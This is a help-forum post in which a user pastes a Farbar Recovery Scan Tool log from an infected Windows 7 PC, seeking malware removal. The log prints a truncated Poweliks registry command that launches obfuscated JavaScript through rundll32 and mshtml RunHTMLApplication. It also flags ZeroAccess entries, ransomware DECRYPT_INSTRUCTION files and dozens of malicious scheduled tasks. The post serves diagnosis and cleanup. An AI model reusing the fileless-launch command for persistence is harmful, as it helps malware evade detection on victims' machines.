Jump to content

dllhost32 keeps running with javascript RunHtmlApplication

aagah

By aagah
in Resolved Malware Removal Logs

 Share

Recommended Posts

aagah

aagah

Posted
Posted

Here is my FRST.log

 

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 27-09-2014
Ran by smotamedy (administrator) on SMOTAMDEY on 27-09-2014 17:56:48
Running from F:\
Loaded Profile: smotamedy (Available profiles: admin & smotamedy)
Platform: Microsoft Windows 7 Professional  (X86) OS Language: English (United States)
Internet Explorer Version 8
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Enigma Software Group USA, LLC.) C:\Program Files\Enigma Software Group\SpyHunter\SH4Service.exe
(Cisco WebEx LLC) C:\Windows\System32\atashost.exe
(Digital Delivery Networks, Inc.) C:\Program Files\DDNI\DIBS\DDNIService.exe
(Lenovo) C:\Program Files\ThinkPad\Utilities\PWMDBSVC.exe
() C:\Program Files\Lenovo\Lenovo Slim USB Keyboard\Sks8821.exe
(Ulead Systems, Inc.) C:\Program Files\Common Files\Ulead Systems\DVD\ULCDRSvr.exe
(LITEON) C:\Program Files\Lenovo\Lenovo Slim USB Keyboard\skdh8821.exe
(Enigma Software Group USA, LLC.) C:\Program Files\Enigma Software Group\SpyHunter\SpyHunter4.exe
(Intuit Inc.) C:\Program Files\Common Files\Intuit\QuickBooks\QBUpdate\qbupdate.exe
(Intuit Inc.) C:\Program Files\Intuit\QuickBooks 2012\QBW32.EXE
(Digital Delivery Networks, Inc.) C:\Program Files\DDNI\Lenovo Idea Notes\DDNIMSGService.exe
(Microsoft Corp.) C:\Program Files\Microsoft\Search Enhancement Pack\SeaPort\SeaPort.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\System Update\SUService.exe
(Lenovo Group Limited) C:\Program Files\Common Files\Lenovo\tvt_reg_monitor_svc.exe
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(Microsoft Corporation) C:\Windows\System32\mobsync.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MpCmdRun.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
Winlogon\Notify\vvubjer: C:\Users\SMOTAM~1\AppData\Local\Temp\yhO0a9p3PC3iH3FRVaL\AppData\Local\vvubjer.dll [X]
HKLM\...D6A79037F57F\InprocServer32: [Default-fastprox] fastprox.dll ATTENTION! ====> ZeroAccess?
HKLM\...\Policies\Explorer: [NoWelcomeScreen] 1
HKU\S-1-5-21-499009960-272174587-744029597-1146\...\Run: [msnmsgr] => C:\Program Files\Windows Live\Messenger\msnmsgr.exe [3883856 2009-07-26] (Microsoft Corporation)
HKU\S-1-5-21-499009960-272174587-744029597-1146\...\Policies\Explorer: [Run] "C:\Users\smotamedy\AppData\Roaming\Microsoft\Windows\IEUpdate\esentutl.exe"
HKU\S-1-5-21-499009960-272174587-744029597-1146\...\MountPoints2: {cb82d864-b72f-11df-aa94-806e6f6e6963} - Q:\LenovoQDrive.exe
HKU\S-1-5-21-499009960-272174587-744029597-1146\...409d6c4515e9\InprocServer32: [Default-shell32] C:\$Recycle.Bin\S-1-5-21-499009960-272174587-744029597-1146\$0a1e85f3e1cd51d1261ae5ea5aa3df51\n. ATTENTION! ====> ZeroAccess?
HKU\S-1-5-21-499009960-272174587-744029597-1146\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
HKU\S-1-5-18\...\RunOnce: [FlashPlayerUpdate] => C:\Windows\system32\Macromed\Flash\FlashUtil10n_ActiveX.exe -update activex
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Intuit Data Protect.lnk
ShortcutTarget: Intuit Data Protect.lnk -> C:\Program Files\Common Files\Intuit\DataProtect\IntuitDataProtect.exe (Intuit Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\QuickBooks Update Agent.lnk
ShortcutTarget: QuickBooks Update Agent.lnk -> C:\Program Files\Common Files\Intuit\QuickBooks\QBUpdate\qbupdate.exe (Intuit Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\QuickBooks_Standard_21.lnk
ShortcutTarget: QuickBooks_Standard_21.lnk -> C:\Program Files\Intuit\QuickBooks 2012\QBW32.EXE (Intuit Inc.)
Startup: C:\Users\smotamedy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\esentutl.lnk
ShortcutTarget: esentutl.lnk -> C:\Users\smotamedy\AppData\Roaming\Microsoft\Windows\IEUpdate\esentutl.exe (No File)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://lenovo.msn.com
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Secondary_Page_URL = http://www.lenovo.com/welcome/thinkcentre
SearchScopes: HKCU - DefaultScope {CAB6444A-D968-40CC-8D3D-32F912B73043} URL = 
SearchScopes: HKCU - {CAB6444A-D968-40CC-8D3D-32F912B73043} URL = 
BHO: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO: No Name -> {5C255C8A-E604-49b4-9D64-90988571CECB} ->  No File
BHO: Search Helper -> {6EBF7485-159F-4bff-A14F-B9E3AAC4465B} -> C:\Program Files\Microsoft\Search Enhancement Pack\Search Helper\SearchHelper.dll (Microsoft Corp.)
BHO: Windows Live Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corporation)
BHO: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre6\bin\jp2ssv.dll (Sun Microsystems, Inc.)
BHO: Windows Live Toolbar Helper -> {E15A8DC0-8516-42A1-81EA-DC94EC1ACF10} -> C:\Program Files\Windows Live\Toolbar\wltcore.dll (Microsoft Corporation)
Toolbar: HKLM - &Windows Live Toolbar - {21FA44EF-376D-4D53-9B0F-8A89D3229068} - C:\Program Files\Windows Live\Toolbar\wltcore.dll (Microsoft Corporation)
Toolbar: HKCU - &Windows Live Toolbar - {21FA44EF-376D-4D53-9B0F-8A89D3229068} - C:\Program Files\Windows Live\Toolbar\wltcore.dll (Microsoft Corporation)
Handler: intu-help-qb5 - {867FCB77-9823-4cd6-8210-D85F968D466F} - C:\Program Files\Intuit\QuickBooks 2012\HelpAsyncPluggableProtocol.dll (Intuit, Inc.)
Handler: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files\Windows Live\Messenger\msgrapp.14.0.8089.0726.dll (Microsoft Corporation)
Handler: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files\Windows Live\Messenger\msgrapp.14.0.8089.0726.dll (Microsoft Corporation)
Handler: qbwc - {FC598A64-626C-4447-85B8-53150405FD57} - C:\Windows\system32\mscoree.dll (Microsoft Corporation)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.254
 
FireFox:
========
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32.dll ()
FF Plugin: @java.com/JavaPlugin -> C:\Program Files\Java\jre6\bin\new_plugin\npjp2.dll (Sun Microsystems, Inc.)
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.20513.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=14.0.8081.0709 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
 
Chrome: 
=======
 
========================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 atashost; C:\Windows\system32\atashost.exe [43912 2010-11-23] (Cisco WebEx LLC)
R2 DDNIMSGService; C:\Program Files\DDNI\Lenovo Idea Notes\DDNIMSGService.exe [171872 2010-07-20] (Digital Delivery Networks, Inc.) [File not signed]
R2 DDNIService; C:\Program Files\DDNI\DIBS\DDNIService.exe [163680 2010-07-23] (Digital Delivery Networks, Inc.) [File not signed]
S4 QBCFMonitorService; C:\Program Files\Common Files\Intuit\QuickBooks\QBCFMonitorService.exe [45056 2013-11-08] (Intuit) [File not signed]
S3 QBFCService; C:\Program Files\Common Files\Intuit\QuickBooks\FCS\Intuit.QuickBooks.FCS.exe [61440 2011-08-19] (Intuit Inc.) [File not signed]
S4 QBVSS; C:\Program Files\Common Files\Intuit\DataProtect\QBIDPService.exe [1248256 2011-08-19] (Intuit Inc.) [File not signed]
R2 Sks8821; C:\Program Files\Lenovo\Lenovo Slim USB Keyboard\Sks8821.exe [125952 2010-05-04] () [File not signed]
R2 SpyHunter 4 Service; C:\Program Files\Enigma Software Group\SpyHunter\SH4Service.exe [770432 2014-01-09] (Enigma Software Group USA, LLC.)
R2 SUService; c:\Program Files\Lenovo\System Update\SUService.exe [28672 2010-03-15] (Lenovo Group Limited) [File not signed]
R2 ThinkVantage Registry Monitor Service; C:\Program Files\Common Files\Lenovo\tvt_reg_monitor_svc.exe [1019904 2009-08-28] (Lenovo Group Limited) [File not signed]
S3 TVT Backup Service; C:\Program Files\Lenovo\Rescue and Recovery\rrservice.exe [1474560 2009-09-03] (Lenovo Group Limited) [File not signed]
R2 UleadBurningHelper; C:\Program Files\Common Files\Ulead Systems\DVD\ULCDRSvr.exe [61440 2008-01-10] (Ulead Systems, Inc.) [File not signed]
S3 COMSysApp; %SystemRoot%\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} [X]
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
S3 AcpiPmi; C:\Windows\system32\DRIVERS\acpipmi.sys [40448 2009-07-13] (Microsoft Corporation) [File not signed]
S3 aliide; C:\Windows\system32\DRIVERS\aliide.sys [40448 2009-07-13] (Acer Laboratories Inc.) [File not signed]
S3 amdide; C:\Windows\system32\DRIVERS\amdide.sys [40448 2009-07-13] (Microsoft Corporation) [File not signed]
S3 BrFiltLo; C:\Windows\system32\DRIVERS\BrFiltLo.sys [40448 2009-07-13] (Brother Industries, Ltd.) [File not signed]
S3 BrFiltUp; C:\Windows\system32\DRIVERS\BrFiltUp.sys [40448 2009-07-13] (Brother Industries, Ltd.) [File not signed]
S3 BrUsbMdm; C:\Windows\System32\Drivers\BrUsbMdm.sys [40448 2009-07-13] (Brother Industries Ltd.) [File not signed]
S3 BrUsbSer; C:\Windows\System32\Drivers\BrUsbSer.sys [40448 2009-07-13] (Brother Industries Ltd.) [File not signed]
S3 BthEnum; C:\Windows\System32\DRIVERS\BthEnum.sys [40448 2009-07-13] (Microsoft Corporation) [File not signed]
S3 circlass; C:\Windows\system32\DRIVERS\circlass.sys [40448 2009-07-13] (Microsoft Corporation) [File not signed]
S3 CmBatt; C:\Windows\system32\DRIVERS\CmBatt.sys [40448 2009-07-13] (Microsoft Corporation) [File not signed]
S3 cmdide; C:\Windows\system32\DRIVERS\cmdide.sys [40448 2009-07-13] (CMD Technology, Inc.) [File not signed]
S4 crcdisk; C:\Windows\system32\DRIVERS\crcdisk.sys [40448 2009-07-13] (Microsoft Corporation) [File not signed]
S3 ErrDev; C:\Windows\system32\DRIVERS\errdev.sys [40448 2009-07-13] (Microsoft Corporation) [File not signed]
S3 EsgScanner; C:\Windows\System32\DRIVERS\EsgScanner.sys [19984 2012-06-22] ()
S3 fdc; C:\Windows\system32\DRIVERS\fdc.sys [40448 2009-07-13] (Microsoft Corporation) [File not signed]
S3 flpydisk; C:\Windows\system32\DRIVERS\flpydisk.sys [40448 2009-07-13] (Microsoft Corporation) [File not signed]
S3 hcw85cir; C:\Windows\system32\drivers\hcw85cir.sys [40448 2009-07-13] (Hauppauge Computer Works, Inc.) [File not signed]
S3 HidBatt; C:\Windows\system32\DRIVERS\HidBatt.sys [40448 2009-07-13] (Microsoft Corporation) [File not signed]
S3 HidIr; C:\Windows\system32\DRIVERS\hidir.sys [40448 2009-07-13] (Microsoft Corporation) [File not signed]
S3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [110296 2014-09-27] (Malwarebytes Corporation)
S3 megasas; C:\Windows\system32\DRIVERS\megasas.sys [40448 2009-07-13] (LSI Corporation) [File not signed]
R0 vdorctrl; C:\Windows\System32\DRIVERS\vdorctrl.sys [44544 2009-07-13] () [File not signed]
 
==================== NetSvcs (Whitelisted) ===================
 
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-09-27 17:56 - 2014-09-27 17:56 - 00000000 ____D () C:\FRST
2014-09-27 16:48 - 2014-09-27 16:48 - 00002246 _____ () C:\Users\smotamedy\Desktop\SpyHunter.lnk
2014-09-27 16:48 - 2014-09-27 16:48 - 00000106 _____ () C:\spyhunter.fix
2014-09-27 16:48 - 2014-09-27 16:48 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SpyHunter
2014-09-27 16:48 - 2014-09-27 16:48 - 00000000 ____D () C:\sh4ldr
2014-09-27 16:48 - 2014-09-27 16:48 - 00000000 ____D () C:\Program Files\Enigma Software Group
2014-09-27 16:48 - 2013-10-18 15:01 - 00285747 _____ () C:\shldr
2014-09-27 16:48 - 2013-10-18 15:01 - 00008192 _____ () C:\shldr.mbr
2014-09-27 16:47 - 2014-09-27 16:48 - 00000000 ____D () C:\Windows\455F074C814E4520B69B5584BD90400C.TMP
2014-09-27 16:47 - 2014-09-27 16:47 - 00000000 ____D () C:\Program Files\Common Files\Wise Installation Wizard
2014-09-27 14:39 - 2014-09-27 14:53 - 00110296 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-09-27 14:38 - 2014-09-27 14:49 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-09-27 14:38 - 2014-09-27 14:38 - 00001056 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-09-27 14:38 - 2014-09-27 14:38 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-09-27 14:38 - 2014-09-27 14:38 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-09-27 14:38 - 2014-05-12 07:26 - 00051928 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-09-27 14:38 - 2014-05-12 07:25 - 00074456 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-09-27 14:38 - 2014-05-12 07:25 - 00023256 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-09-25 11:57 - 2014-09-25 11:31 - 00244136 _____ () C:\Users\smotamedy\Downloads\Firefox Setup Stub 32.0.3.exe
2014-09-08 11:41 - 2014-09-27 14:58 - 00017470 _____ () C:\Windows\PFRO.log
2014-09-08 10:16 - 2014-09-08 10:16 - 00000000 ____D () C:\Windows\system32\%SystemDrive%
2014-09-07 03:09 - 2014-09-26 13:09 - 00073512 _____ () C:\feeddl.dat
2014-09-07 02:57 - 2014-09-08 12:41 - 00054156 ____H () C:\Windows\QTFont.qfn
2014-09-07 02:57 - 2014-09-07 02:57 - 00001409 _____ () C:\Windows\QTFont.for
2014-09-07 01:28 - 2014-09-07 01:28 - 00008174 _____ () C:\Users\smotamedy\Documents\DECRYPT_INSTRUCTION.HTML
2014-09-07 01:28 - 2014-09-07 01:28 - 00008174 _____ () C:\Users\smotamedy\DECRYPT_INSTRUCTION.HTML
2014-09-07 01:28 - 2014-09-07 01:28 - 00008174 _____ () C:\Users\DECRYPT_INSTRUCTION.HTML
2014-09-07 01:28 - 2014-09-07 01:28 - 00008174 _____ () C:\DECRYPT_INSTRUCTION.HTML
2014-09-07 01:28 - 2014-09-07 01:28 - 00004132 _____ () C:\Users\smotamedy\Documents\DECRYPT_INSTRUCTION.TXT
2014-09-07 01:28 - 2014-09-07 01:28 - 00004132 _____ () C:\Users\smotamedy\DECRYPT_INSTRUCTION.TXT
2014-09-07 01:28 - 2014-09-07 01:28 - 00004132 _____ () C:\Users\DECRYPT_INSTRUCTION.TXT
2014-09-07 01:28 - 2014-09-07 01:28 - 00004132 _____ () C:\DECRYPT_INSTRUCTION.TXT
2014-09-07 01:28 - 2014-09-07 01:28 - 00000254 _____ () C:\Users\smotamedy\Documents\DECRYPT_INSTRUCTION.URL
2014-09-07 01:28 - 2014-09-07 01:28 - 00000254 _____ () C:\Users\smotamedy\DECRYPT_INSTRUCTION.URL
2014-09-07 01:28 - 2014-09-07 01:28 - 00000254 _____ () C:\Users\DECRYPT_INSTRUCTION.URL
2014-09-07 01:28 - 2014-09-07 01:28 - 00000254 _____ () C:\DECRYPT_INSTRUCTION.URL
2014-09-07 01:26 - 2014-09-07 01:26 - 00008174 _____ () C:\Users\smotamedy\AppData\Roaming\DECRYPT_INSTRUCTION.HTML
2014-09-07 01:26 - 2014-09-07 01:26 - 00008174 _____ () C:\Users\smotamedy\AppData\DECRYPT_INSTRUCTION.HTML
2014-09-07 01:26 - 2014-09-07 01:26 - 00004132 _____ () C:\Users\smotamedy\AppData\Roaming\DECRYPT_INSTRUCTION.TXT
2014-09-07 01:26 - 2014-09-07 01:26 - 00004132 _____ () C:\Users\smotamedy\AppData\DECRYPT_INSTRUCTION.TXT
2014-09-07 01:26 - 2014-09-07 01:26 - 00000254 _____ () C:\Users\smotamedy\AppData\Roaming\DECRYPT_INSTRUCTION.URL
2014-09-07 01:26 - 2014-09-07 01:26 - 00000254 _____ () C:\Users\smotamedy\AppData\DECRYPT_INSTRUCTION.URL
2014-09-07 01:23 - 2014-09-07 01:23 - 00008174 _____ () C:\Users\smotamedy\AppData\Local\DECRYPT_INSTRUCTION.HTML
2014-09-07 01:23 - 2014-09-07 01:23 - 00004132 _____ () C:\Users\smotamedy\AppData\Local\DECRYPT_INSTRUCTION.TXT
2014-09-07 01:23 - 2014-09-07 01:23 - 00000254 _____ () C:\Users\smotamedy\AppData\Local\DECRYPT_INSTRUCTION.URL
2014-09-07 01:21 - 2014-09-07 01:21 - 00008174 _____ () C:\Users\Public\Documents\DECRYPT_INSTRUCTION.HTML
2014-09-07 01:21 - 2014-09-07 01:21 - 00008174 _____ () C:\Users\Public\DECRYPT_INSTRUCTION.HTML
2014-09-07 01:21 - 2014-09-07 01:21 - 00004132 _____ () C:\Users\Public\Documents\DECRYPT_INSTRUCTION.TXT
2014-09-07 01:21 - 2014-09-07 01:21 - 00004132 _____ () C:\Users\Public\DECRYPT_INSTRUCTION.TXT
2014-09-07 01:21 - 2014-09-07 01:21 - 00000254 _____ () C:\Users\Public\Documents\DECRYPT_INSTRUCTION.URL
2014-09-07 01:21 - 2014-09-07 01:21 - 00000254 _____ () C:\Users\Public\DECRYPT_INSTRUCTION.URL
2014-09-07 01:05 - 2014-09-27 17:05 - 00000354 _____ () C:\Windows\Tasks\At84.job
2014-09-07 01:05 - 2014-09-27 17:05 - 00000352 _____ () C:\Windows\Tasks\At83.job
2014-09-07 01:05 - 2014-09-27 16:05 - 00000354 _____ () C:\Windows\Tasks\At82.job
2014-09-07 01:05 - 2014-09-27 16:05 - 00000352 _____ () C:\Windows\Tasks\At81.job
2014-09-07 01:05 - 2014-09-27 15:05 - 00000354 _____ () C:\Windows\Tasks\At80.job
2014-09-07 01:05 - 2014-09-27 15:05 - 00000352 _____ () C:\Windows\Tasks\At79.job
2014-09-07 01:05 - 2014-09-27 14:05 - 00000354 _____ () C:\Windows\Tasks\At78.job
2014-09-07 01:05 - 2014-09-27 14:05 - 00000352 _____ () C:\Windows\Tasks\At77.job
2014-09-07 01:05 - 2014-09-27 13:05 - 00000354 _____ () C:\Windows\Tasks\At76.job
2014-09-07 01:05 - 2014-09-27 13:05 - 00000352 _____ () C:\Windows\Tasks\At75.job
2014-09-07 01:05 - 2014-09-25 23:05 - 00000354 _____ () C:\Windows\Tasks\At96.job
2014-09-07 01:05 - 2014-09-25 23:05 - 00000352 _____ () C:\Windows\Tasks\At95.job
2014-09-07 01:05 - 2014-09-25 22:09 - 00000352 _____ () C:\Windows\Tasks\At93.job
2014-09-07 01:05 - 2014-09-25 22:05 - 00000354 _____ () C:\Windows\Tasks\At94.job
2014-09-07 01:05 - 2014-09-25 21:05 - 00000354 _____ () C:\Windows\Tasks\At92.job
2014-09-07 01:05 - 2014-09-25 21:05 - 00000352 _____ () C:\Windows\Tasks\At91.job
2014-09-07 01:05 - 2014-09-25 20:06 - 00000352 _____ () C:\Windows\Tasks\At89.job
2014-09-07 01:05 - 2014-09-25 20:05 - 00000354 _____ () C:\Windows\Tasks\At90.job
2014-09-07 01:05 - 2014-09-24 19:06 - 00000352 _____ () C:\Windows\Tasks\At87.job
2014-09-07 01:05 - 2014-09-24 19:05 - 00000354 _____ () C:\Windows\Tasks\At88.job
2014-09-07 01:05 - 2014-09-24 18:05 - 00000354 _____ () C:\Windows\Tasks\At86.job
2014-09-07 01:05 - 2014-09-24 18:05 - 00000352 _____ () C:\Windows\Tasks\At85.job
2014-09-07 01:04 - 2014-09-26 12:08 - 00000352 _____ () C:\Windows\Tasks\At73.job
2014-09-07 01:04 - 2014-09-26 12:05 - 00000354 _____ () C:\Windows\Tasks\At74.job
2014-09-07 01:04 - 2014-09-26 11:05 - 00000354 _____ () C:\Windows\Tasks\At72.job
2014-09-07 01:04 - 2014-09-26 11:05 - 00000352 _____ () C:\Windows\Tasks\At71.job
2014-09-07 01:04 - 2014-09-26 10:07 - 00000352 _____ () C:\Windows\Tasks\At69.job
2014-09-07 01:04 - 2014-09-26 10:05 - 00000354 _____ () C:\Windows\Tasks\At70.job
2014-09-07 01:04 - 2014-09-26 09:05 - 00000354 _____ () C:\Windows\Tasks\At68.job
2014-09-07 01:04 - 2014-09-26 09:05 - 00000352 _____ () C:\Windows\Tasks\At67.job
2014-09-07 01:04 - 2014-09-26 08:06 - 00000352 _____ () C:\Windows\Tasks\At65.job
2014-09-07 01:04 - 2014-09-26 08:05 - 00000354 _____ () C:\Windows\Tasks\At66.job
2014-09-07 01:04 - 2014-09-26 07:07 - 00000352 _____ () C:\Windows\Tasks\At63.job
2014-09-07 01:04 - 2014-09-26 07:05 - 00000354 _____ () C:\Windows\Tasks\At64.job
2014-09-07 01:04 - 2014-09-26 06:05 - 00000354 _____ () C:\Windows\Tasks\At62.job
2014-09-07 01:04 - 2014-09-26 06:05 - 00000352 _____ () C:\Windows\Tasks\At61.job
2014-09-07 01:04 - 2014-09-26 05:05 - 00000354 _____ () C:\Windows\Tasks\At60.job
2014-09-07 01:04 - 2014-09-26 05:05 - 00000352 _____ () C:\Windows\Tasks\At59.job
2014-09-07 01:04 - 2014-09-26 04:05 - 00000354 _____ () C:\Windows\Tasks\At58.job
2014-09-07 01:04 - 2014-09-26 04:05 - 00000352 _____ () C:\Windows\Tasks\At57.job
2014-09-07 01:04 - 2014-09-26 03:05 - 00000354 _____ () C:\Windows\Tasks\At56.job
2014-09-07 01:04 - 2014-09-26 03:05 - 00000352 _____ () C:\Windows\Tasks\At55.job
2014-09-07 01:04 - 2014-09-26 02:05 - 00000354 _____ () C:\Windows\Tasks\At54.job
2014-09-07 01:04 - 2014-09-26 02:05 - 00000352 _____ () C:\Windows\Tasks\At53.job
2014-09-07 01:04 - 2014-09-26 01:05 - 00000354 _____ () C:\Windows\Tasks\At52.job
2014-09-07 01:04 - 2014-09-26 01:05 - 00000352 _____ () C:\Windows\Tasks\At51.job
2014-09-07 01:04 - 2014-09-26 00:05 - 00000354 _____ () C:\Windows\Tasks\At50.job
2014-09-07 01:04 - 2014-09-26 00:05 - 00000352 _____ () C:\Windows\Tasks\At49.job
2014-09-07 00:45 - 2014-09-08 20:53 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Awesdoop
2014-09-07 00:44 - 2014-09-08 22:34 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Zovoheap
2014-09-07 00:42 - 2014-09-27 14:49 - 00000000 ____D () C:\ProgramData\AfufGasor
2014-09-07 00:24 - 2014-09-27 13:05 - 00000112 _____ () C:\ProgramData\bw5EWA37M.dat
2014-09-07 00:23 - 2014-09-27 17:05 - 00000348 _____ () C:\Windows\Tasks\At36.job
2014-09-07 00:23 - 2014-09-27 17:05 - 00000346 _____ () C:\Windows\Tasks\At35.job
2014-09-07 00:23 - 2014-09-25 23:05 - 00000348 _____ () C:\Windows\Tasks\At48.job
2014-09-07 00:23 - 2014-09-25 23:05 - 00000346 _____ () C:\Windows\Tasks\At47.job
2014-09-07 00:23 - 2014-09-25 22:05 - 00000348 _____ () C:\Windows\Tasks\At46.job
2014-09-07 00:23 - 2014-09-25 22:05 - 00000346 _____ () C:\Windows\Tasks\At45.job
2014-09-07 00:23 - 2014-09-25 21:05 - 00000348 _____ () C:\Windows\Tasks\At44.job
2014-09-07 00:23 - 2014-09-25 21:05 - 00000346 _____ () C:\Windows\Tasks\At43.job
2014-09-07 00:23 - 2014-09-25 20:09 - 00000346 _____ () C:\Windows\Tasks\At41.job
2014-09-07 00:23 - 2014-09-25 20:05 - 00000348 _____ () C:\Windows\Tasks\At42.job
2014-09-07 00:23 - 2014-09-24 19:05 - 00000348 _____ () C:\Windows\Tasks\At40.job
2014-09-07 00:23 - 2014-09-24 19:05 - 00000346 _____ () C:\Windows\Tasks\At39.job
2014-09-07 00:23 - 2014-09-24 18:06 - 00000346 _____ () C:\Windows\Tasks\At37.job
2014-09-07 00:23 - 2014-09-24 18:05 - 00000348 _____ () C:\Windows\Tasks\At38.job
2014-09-07 00:22 - 2014-09-27 16:49 - 00000346 _____ () C:\Windows\Tasks\At33.job
2014-09-07 00:22 - 2014-09-27 16:05 - 00000348 _____ () C:\Windows\Tasks\At34.job
2014-09-07 00:22 - 2014-09-27 15:05 - 00000348 _____ () C:\Windows\Tasks\At32.job
2014-09-07 00:22 - 2014-09-27 15:05 - 00000346 _____ () C:\Windows\Tasks\At31.job
2014-09-07 00:22 - 2014-09-27 14:49 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Ymyqbyg
2014-09-07 00:22 - 2014-09-27 14:05 - 00000348 _____ () C:\Windows\Tasks\At30.job
2014-09-07 00:22 - 2014-09-27 14:05 - 00000346 _____ () C:\Windows\Tasks\At29.job
2014-09-07 00:22 - 2014-09-27 13:05 - 00000348 _____ () C:\Windows\Tasks\At28.job
2014-09-07 00:22 - 2014-09-27 13:05 - 00000346 _____ () C:\Windows\Tasks\At27.job
2014-09-07 00:22 - 2014-09-26 12:06 - 00000346 _____ () C:\Windows\Tasks\At25.job
2014-09-07 00:22 - 2014-09-26 12:05 - 00000348 _____ () C:\Windows\Tasks\At26.job
2014-09-07 00:22 - 2014-09-26 11:07 - 00000346 _____ () C:\Windows\Tasks\At23.job
2014-09-07 00:22 - 2014-09-26 11:05 - 00000348 _____ () C:\Windows\Tasks\At24.job
2014-09-07 00:22 - 2014-09-26 10:05 - 00000348 _____ () C:\Windows\Tasks\At22.job
2014-09-07 00:22 - 2014-09-26 10:05 - 00000346 _____ () C:\Windows\Tasks\At21.job
2014-09-07 00:22 - 2014-09-26 09:05 - 00000348 _____ () C:\Windows\Tasks\At20.job
2014-09-07 00:22 - 2014-09-26 09:05 - 00000346 _____ () C:\Windows\Tasks\At19.job
2014-09-07 00:22 - 2014-09-26 08:08 - 00000346 _____ () C:\Windows\Tasks\At17.job
2014-09-07 00:22 - 2014-09-26 08:05 - 00000348 _____ () C:\Windows\Tasks\At18.job
2014-09-07 00:22 - 2014-09-26 07:05 - 00000348 _____ () C:\Windows\Tasks\At16.job
2014-09-07 00:22 - 2014-09-26 07:05 - 00000346 _____ () C:\Windows\Tasks\At15.job
2014-09-07 00:21 - 2014-09-26 06:05 - 00000348 _____ () C:\Windows\Tasks\At14.job
2014-09-07 00:21 - 2014-09-26 06:05 - 00000346 _____ () C:\Windows\Tasks\At13.job
2014-09-07 00:21 - 2014-09-26 05:05 - 00000348 _____ () C:\Windows\Tasks\At12.job
2014-09-07 00:21 - 2014-09-26 05:05 - 00000346 _____ () C:\Windows\Tasks\At11.job
2014-09-07 00:21 - 2014-09-26 04:05 - 00000348 _____ () C:\Windows\Tasks\At10.job
2014-09-07 00:21 - 2014-09-26 04:05 - 00000346 _____ () C:\Windows\Tasks\At9.job
2014-09-07 00:21 - 2014-09-26 03:06 - 00000346 _____ () C:\Windows\Tasks\At7.job
2014-09-07 00:21 - 2014-09-26 03:05 - 00000348 _____ () C:\Windows\Tasks\At8.job
2014-09-07 00:21 - 2014-09-26 02:05 - 00000348 _____ () C:\Windows\Tasks\At6.job
2014-09-07 00:21 - 2014-09-26 02:05 - 00000346 _____ () C:\Windows\Tasks\At5.job
2014-09-07 00:21 - 2014-09-26 01:05 - 00000348 _____ () C:\Windows\Tasks\At4.job
2014-09-07 00:21 - 2014-09-26 01:05 - 00000346 _____ () C:\Windows\Tasks\At3.job
2014-09-07 00:21 - 2014-09-26 00:05 - 00000348 _____ () C:\Windows\Tasks\At2.job
